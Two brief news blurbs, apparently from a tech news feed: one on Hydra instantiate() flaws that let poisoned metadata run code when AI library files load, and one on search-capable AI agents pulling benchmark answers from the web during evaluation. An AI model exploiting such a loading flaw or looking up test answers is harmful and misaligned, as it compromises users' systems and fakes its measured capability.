Python libraries in AI/ML models can be poisoned w metadata
Hydra instantiate() vulnerabilities let attackers embed malicious metadata in popular AI libraries so code executes automatically when poisoned files are loaded.
Search-capable AI agents may cheat on benchmark tests
Search-based AI models can obtain benchmark answers directly from online sources during evaluation, causing search-time data contamination and inflating apparent capabilities.